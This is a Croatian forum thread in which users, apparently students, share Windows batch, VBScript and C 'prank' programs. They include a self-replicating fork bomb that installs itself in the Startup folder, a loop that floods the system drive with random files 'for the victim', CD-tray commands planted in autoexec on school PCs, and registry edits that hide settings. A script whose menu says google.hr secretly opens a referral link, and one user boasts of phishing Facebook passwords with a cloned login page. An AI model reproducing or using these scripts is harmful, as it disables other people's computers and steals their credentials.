hahah ova homo stvar je kraljevska :D
- +/- sve poruke
- ravni prikaz
- starije poruke gore
Evo da vam oživim malo temu. Inače, ovo nije moja ideja, samo sam pokupio par ideja i spojio ih u skriptu.
Ideju za kopiranje u startup mi je dao forumaš jedan.
@echo off
copy skripta.bat "%SystemDrive%\Documents and Settings\%username%\Start Menu\Programs\Startup\skripta.bat
:top
start skripta.bat
goto top
Dakle, što radi?
echo sakriva poruke, to valjda svi znaju.
copy kopira ovu skriptu u startup folder tako da se prilikom pokretanja računala skripta ponovo izvrši
Ovo dalje je jasno. Skripta pokreće sama sebe, te skripte dalje počnu pokretat same sebe te tako u nedogled,
dok se ne popuni memorija i (u većini slučaja) smrznu Windowsi. Ovo se još zove i fork bombing.
Da se odmah ogradim, ne odgovaram za posljedice. Ovoga se može riješiti jedino iz safe modea.
Ali, možete i dodati da se naredba start pokrene nakon nekog izvjesnog vremena, tako da ako sami isprobavate
imate vremena izbrisati ju iz starup foldera. Uglavnom, ovo napravite samo nekomu koga zaista ne volite.
Moze prijedlog,umjesto "START scripta.bat" stavi START %0%
evo jedna glupost od mene, ovo u notepad i sufiks .bat :) samo pokrenite nije nikakav virus (za pochetnike) x D
@echo off
:hack
echo Eat Shit Motherfucker!!!!
goto hack
@xZero1 - erm, koga pokušavaš zavarati? Očito je da neznaš, i u tome nema ništa loše. Ali zašto se pretvarati?
@!mpact35 - što se tiće mog znanja, poznajem prilično dobro C/C++, nešto .NET jezika (VB, C#), natucam neke egzotične jezike (Ruby, BrainFuck!...). Ne smatram se nekim vrsnim programerom (i ja sam u srednjoj školi), ali eto, živcira me kad se 10godišnjaci hvale "svojim" uberkul cmd batchevima. Ali valjda sam i ja bio u toj fazi... u pravu si. Isključujem se iz ove teme, osim ako nešto posebno ne privuce moju pozornost =)
Neznaš o čemu pričaš...ni blizu...čovjek stvarno zna znanje...
a ono što si reko da znam c/p (copy-pasteat), malo si krivo razumio, ja sam to kopiro s svojeg bloga...
nego ajd da stavim jedan c "poluvirus" (neka vrsta virusa i je, ali mora bit upaljen satima i satima da bi napravio sitnu štetu koja se ukloni u roku od 2-3 sec.), prije bi se ogo nazvat normalnim programom jer ko zna, možda vam jednom i zatreba šar tisuća 9 u jednom txt fileu...itfan, ti češ ovaj program razumjeti jer ti znaš dobro c....
#include <stdio.h>
#define true 1
main()
{
FILE *bono;
bono = fopen ("bono.txt", "w");
while (true)
{
fprintf (bono, "9");
}
}
P.S. ako nemate kompajler za c, onda vam ovo stvarno ništa ne vrjedi...
fali ti int prije main() :D (iako će u većini kompajlera raditi i bez toga, novo pravilo Ca je da pišeš tipove)
@xZero1 - erm, koga pokušavaš zavarati? Očito je da neznaš, i u tome nema ništa loše. Ali zašto se pretvarati?
@!mpact35 - što se tiće mog znanja, poznajem prilično dobro C/C++, nešto .NET jezika (VB, C#), natucam neke egzotične jezike (Ruby, BrainFuck!...). Ne smatram se nekim vrsnim programerom (i ja sam u srednjoj školi), ali eto, živcira me kad se 10godišnjaci hvale "svojim" uberkul cmd batchevima. Ali valjda sam i ja bio u toj fazi... u pravu si. Isključujem se iz ove teme, osim ako nešto posebno ne privuce moju pozornost =)
Neznaš o čemu pričaš...ni blizu...čovjek stvarno zna znanje...
a ono što si reko da znam c/p (copy-pasteat), malo si krivo razumio, ja sam to kopiro s svojeg bloga...
nego ajd da stavim jedan c "poluvirus" (neka vrsta virusa i je, ali mora bit upaljen satima i satima da bi napravio sitnu štetu koja se ukloni u roku od 2-3 sec.), prije bi se ogo nazvat normalnim programom jer ko zna, možda vam jednom i zatreba šar tisuća 9 u jednom txt fileu...itfan, ti češ ovaj program razumjeti jer ti znaš dobro c....
#include <stdio.h>
#define true 1
main()
{
FILE *bono;
bono = fopen ("bono.txt", "w");
while (true)
{
fprintf (bono, "9");
}
}
P.S. ako nemate kompajler za c, onda vam ovo stvarno ništa ne vrjedi...
Slažem se. Zanimljiva scripta :D
jel zna itko kako staviti da se nevidi kad se neki program izvodi (tipa kad se izvodi vbs nevidi se da je išta pokrenuto osim u task manageru, ali svejedno radi)?
Znam da radi, ali mislim da je ono kompliciranje bezveze... slobodno izbaci :top i goto :top
nije, ovako puno brže radi...
Znam da radi, ali mislim da je ono kompliciranje bezveze... slobodno izbaci :top i goto :top
nije, ovako puno brže radi...
Doista? Batchovo shellanje podržava više procesa?
Uh, nadam se da si to provjerio, jer mi zvuči veoma nerealno.
Možete mi reći kako spremiti u notepad-u u .vbs i .bat. Nemam pojma o tome!
upišeš u Notepad i ideš na "Datoteka" pa "Spremi kao..." i onda upišeš naziv i dodaš nastavak recimo .vbs
Primjer:
šala.vbs
Zanima me dali je moguce zakamuflirati link tj. web addressu.
Naprimjer link izgleda da je od youtubea a zapravo vodi na yahoo,
Nisan tija otvarati novu temu, nadam se da nisan nekoga naljutia
Zanima me dali je moguce zakamuflirati link tj. web addressu.
Naprimjer link izgleda da je od youtubea a zapravo vodi na yahoo,
Nisan tija otvarati novu temu, nadam se da nisan nekoga naljutia
@ECHO OFF
ECHO.
TITLE Created by xZero
ECHO Please select WEB page.
ECHO.
ECHO 1. www.google.hr
ECHO 2. www.bloger.hr
ECHO.
SET/p confirm="Selected >"
IF '%confirm%'=='1' START http://s8.ba.bitefight.org/c.php?uid=34313 & EXIT
IF '%confirm%'=='2' START http://www.google.hr & EXIT
EXIT
jel zna itko kako staviti da se nevidi kad se neki program izvodi (tipa kad se izvodi vbs nevidi se da je išta pokrenuto osim u task manageru, ali svejedno radi)?
Moze.
Treba ti OVO
Za pomoć obratite mi se na MSN: xzero707@hotmail.com
hehhee dodajte ovo kod frenda u autoexec
cd %windir%
nircmd.exe cdrom open d:
nircmd.exe cdrom close d:
naravno :d zamjenite slovom od cd/dvd uređaja xD, ja sam stavio na 3 kompjutera na informatiki, profa sad se ljuti nezna šta je a avast nis ne detektira
fali ti int prije main() :D (iako će u većini kompajlera raditi i bez toga, novo pravilo Ca je da pišeš tipove)
U tom slučaju fali mu i return na kraju :). Ili da stavi void main().
Što se tiče onog batcha, ako se dobro sjećam, svaki novi koji se pokrene opet pokreće nove, pa ti novi nove, pa ti novi novi nove itd. :)
Bilo je davno kad sam to postal, pa ako sam u krivu nek me neko ispravi
@za post ispod itf4n-ovog
Ja bi to nazvao programom, a ne skriptom.
Evo jednog zanimljivog a kratkog:
@ECHO OFF
:BEGIN
ECHO %random%>>%SystemDrive%\%random%%random%%random%.haha
GOTO BEGIN
Spremiti kao bilo_sta.cmd ili bilo_sta.bat i dati zrtvi
Evo jednog zanimljivog a kratkog:
@ECHO OFF
:BEGIN
ECHO %random%>>%SystemDrive%\%random%%random%%random%.haha
GOTO BEGIN
Spremiti kao bilo_sta.cmd ili bilo_sta.bat i dati zrtvi
Bude tebe opet zvao sud doma
Nego daj opisi svakog koji stavis tu da znamo.
Pišite opis pored toga što predložite da znamo o čemu se radi i koliko je opasno
U redu. Slazem se.
neznam ako je bilo, ako je sry
Zelite da vam nitko ne dira background sliku? evo kako:
odite u run i upisite regedit da bi usli u reg editor, i onda u HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system i tu napravite novi DWORD i ime nek mu bude "NoDispBackgroundPage" bez navodnika naravno, dvoklik na to i value mu stavite pod 1, i voila, probajte desni klick na desktop i properties i vidit cete da nesto fali xD
ako zelite vratit na staro stavite value 0 ili izbrisite dword
ovo mi je bila fora u osnovnoj stavit neku golotinju na background i onda to napravit pa onda reakcije profesora kad oce mijenjat pozadinu
bila je i slicna fora s dword u istoj lokaciji za maknut shutdown tipku iz start-a, isto zanimljive reakcije kad neko oce gasit komp
ovo sam probao samo na xp-u, neznam dali na visti i 7-ici radi, idem sad na 7-icu probat
edit: ovaj sistem na 7-ici neradi :(
ajde nek netko napravi prank da izbacuje errore i otvara i zatvara se cdrom na pola minute.....onda stane...pa za pola minute opet...i tako stalno
ajde nek netko napravi prank da izbacuje errore i otvara i zatvara se cdrom na pola minute.....onda stane...pa za pola minute opet...i tako stalno
Ja cu napraviti. Do navecer ce biti gotov.
Ja cu napraviti. Do navecer ce biti gotov.
e hvala...ima da zaje*avam frendove
xZero, imam jednu jednostavnu ideju ali da bude veća fora jel se može kako u spriječiti da se pomiče msgbox (u vbs-u) znači da kad se prozor odvuče negdje da se vrati na staro ili na neku određenu poziciju, recimo 0,0 i tu zaključa?
Evo dat ću ovo:
Do
msgbox "Do you want to close this window?",20,"Question from Windows"
Loop
I to je dosta živcirajuće, ali sad bi još tu trebalo ubaciti ovo da se prozora ne može riješiti tako da se odvuče na rub (uvijek bi se vraćao na staro), ako je moguće.
Veća baza je prozor koji bi bježao tako da korisnik ne može kliknit.
xZero, imam jednu jednostavnu ideju ali da bude veća fora jel se može kako u spriječiti da se pomiče msgbox (u vbs-u) znači da kad se prozor odvuče negdje da se vrati na staro ili na neku određenu poziciju, recimo 0,0 i tu zaključa?
Evo dat ću ovo:
Do
Loop
I to je dosta živcirajuće, ali sad bi još tu trebalo ubaciti ovo da se prozora ne može riješiti tako da se odvuče na rub (uvijek bi se vraćao na staro), ako je moguće.
Pokušat ću
Evo dat ću ovo:
Do
Loop
Pokušat ću
Hvala. Probaj ovo što je MrBlc probao da prozor bježi ako neće uspjeti ovo sa nepomicanjem. I ako sam dobro našao, možda bi pomogli "onMouseDown" i "onMouse Click".
Evo jedan zanimljivi:
MsgBox "Memory violation at 0x04868",21,"firefox.exe"
Set wshShell = WScript.CreateObject ("WSCript.shell")
wshshell.run """c:\Program Files\Mozilla Firefox\firefox.exe""", 6, True
set wshshell = nothing
Što radi? Prikazuje error(prva slika) zatim nakon što se klikne na bilo koji gumb otvara firefox.Napravite shortcut na njega i stavite naziv i ikonu firefoxa i zabava je zajamčena.
P.S. Spremite kao .vbs .
Evo kako ja kupim šifre of Facebooka (ne volim ga). Uploadao sam stranicu na yourfreehosting.net i sada u školi otvorim modificiranu stranicu facebook logina(izgleda isto) i kada netko upiše mail i password meni on dodje u jednu notepad datoteku (isto na yourfreehosting.net). Koga zanimaju pojedinosti više na pm